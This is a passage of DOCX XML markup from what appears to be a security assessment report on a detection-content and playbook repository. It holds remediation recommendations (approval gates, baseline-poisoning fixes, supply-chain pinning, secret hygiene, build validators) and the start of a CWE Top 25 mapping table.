        <w:keepNext/>
        <w:pBdr>
          <w:left w:val="single" w:sz="18" w:space="6" w:color="0B5CAB"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="120" w:right="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>def spl_quote(value):</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"""Return an SPL double-quoted string literal with embedded quotes escaped."""</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return '"' + str(value).replace("\\", "\\\\").replace('"', '\\"') + '"'</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>9.2 One approval-and-exclusion gate before every destructive action</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">Factor the analyst-approval prompt that several playbooks already use into a reusable block, back it with a </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>protected_entities</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> list of break-glass accounts, administrator groups, corporate domains and critical hosts, and place it in front of every account-disable, host-isolate, process-terminate, mail-delete and indicator-block action. Filter the protected entities out before acting and require per-target confirmation for high-impact actions. This retires the ungated-destructive-action findings (PB1-03, PB2-09, PB2-10, DET-10) and removes the self-denial-of-service path that attacker-chosen input currently opens.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>9.3 Separate baseline maintenance from alerting</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">In the stateful detections, remove the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>outputlookup</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> that writes the triggering event back into the allow-list and move promotion into a governed support search that runs less often, excludes events already judged malicious, and requires a minimum observation count and age before trusting a value. The detection becomes read-only against the baseline. This resolves the allow-list-poisoning findings (DET-03, DET-04) and restores the integrity of the "first time seen" pattern.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:pBdr>
          <w:left w:val="single" w:sz="18" w:space="6" w:color="0B5CAB"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="120" w:right="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>... | stats earliest(_time) as firstTimeSeen latest(_time) as lastTimeSeen by service</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 eval observations=1</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 inputlookup previously_seen_running_windows_services append=t</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 stats sum(observations) as observations min(firstTimeSeen) as firstTimeSeen max(lastTimeSeen) as lastTimeSeen by service</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:pBdr>
          <w:left w:val="single" w:sz="18" w:space="6" w:color="0B5CAB"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="120" w:right="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">  | where observations &gt;= 3 AND (now() - firstTimeSeen) &gt; 86400</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:pBdr>
          <w:left w:val="single" w:sz="18" w:space="6" w:color="0B5CAB"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="120" w:right="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">  | outputlookup previously_seen_running_windows_services</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>9.4 Pin the supply chain by content</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>Generate a hash-locked requirements file and install with hash verification; pin every GitHub Action to a commit digest and let the dependency bot maintain it; pin the container images by digest and publish checksums for the app tarballs; move credential setup after package installation in the scheduled job and prefer short-lived federated credentials over long-lived keys; and add the pip and container ecosystems to the dependency bot. This retires the supply-chain findings (DEP-01 to DEP-05, CI-04) and makes the build reproducible.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>9.5 Secret and sample-data hygiene</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>Replace the shipped console password with a per-run generated credential delivered out of band; stop printing the session token to logs and add runtime masking; run the sample-log sanitiser over the data-source fixtures to replace real account identifiers, access-key identifiers and personal data with documented placeholders; and add secret scanning to the pre-commit hooks and the pipeline with an allow-list for the documented placeholders. This retires the secret and data-exposure findings (PB1-06, CI-03, SEC-03 to SEC-05, SEC-08, SEC-10).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>9.6 Build-time validation</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">Add contentctl validators that reject a bare </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>$field$</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> inside any drilldown or </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>map</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> search whose token is not a time variable, that require a protected-entity gate before a destructive playbook action, that confirm each lookup match field exists in its CSV header, and that fail the build on a non-placeholder access key, account identifier or internal domain in the data sources. Enforcing the standard at build time prevents the whole class of issue from recurring, which is more durable than fixing the current instances alone.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t>10. Framework and Standards Mappings</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>Every finding is mapped to the industry frameworks below. Each subsection is also delivered as a standalone document so a reader focused on one framework can use it on its own.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>10.1 CWE and the 2024 CWE Top 25</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>The table lists each 2024 CWE Top 25 weakness, whether this assessment found an instance, and the findings that carry it.</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="864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900"/>
        <w:gridCol w:w="900"/>
        <w:gridCol w:w="3544"/>
        <w:gridCol w:w="900"/>
        <w:gridCol w:w="2396"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:tblHeader w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="900" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="0B5CAB"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Rank</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="900" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="0B5CAB"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>CWE</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3544" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="0B5CAB"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Name</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="900" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="0B5CAB"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Found</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2396" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="0B5CAB"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Findings</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="900" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="900" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>CWE-79</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3544" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Improper Neutralization of Input During Web Page Generation (Cross-site Scripting)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="900" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Yes</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2396" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>PB1-10</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="900" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="900" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>CWE-787</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3544" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Out-of-bounds Write</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="900" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>No</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2396" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>—</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="900" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="900" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>CWE-89</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3544" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>SQL Injection</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="900" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Yes</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2396" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>APP-01, APP-02, PB2-05, PB2-06</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="900" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>4</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="900" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>CWE-352</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3544" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Cross-Site Request Forgery</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="900" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>No</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2396" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>—</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="900" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>5</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="900" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>CWE-22</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3544" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Improper Limitation of a Pathname to a Restricted Directory (Path Traversal)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="900" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Yes</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2396" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>CF-18, PB1-02</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="900" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>6</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="900" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>CWE-125</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3544" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Out-of-bounds Read</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="900" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>No</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2396" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>—</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="900" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>7</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="900" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>CWE-78</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3544" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>OS Command Injection</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="900" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Yes</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2396" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>CI-01, PB2-01, PB2-02, PB2-03, PB2-04, PB2-15</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="900" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>8</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="900" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>CWE-416</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3544" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Use After Free</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="900" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>No</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2396" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>—</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="900" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>9</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="900" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>CWE-862</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3544" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Missing Authorization</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="900" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Yes</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2396" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>CF-09, PB1-03, PB2-10</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="900" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>10</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="900" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>CWE-434</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3544" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Unrestricted Upload of File with Dangerous Type</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="900" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
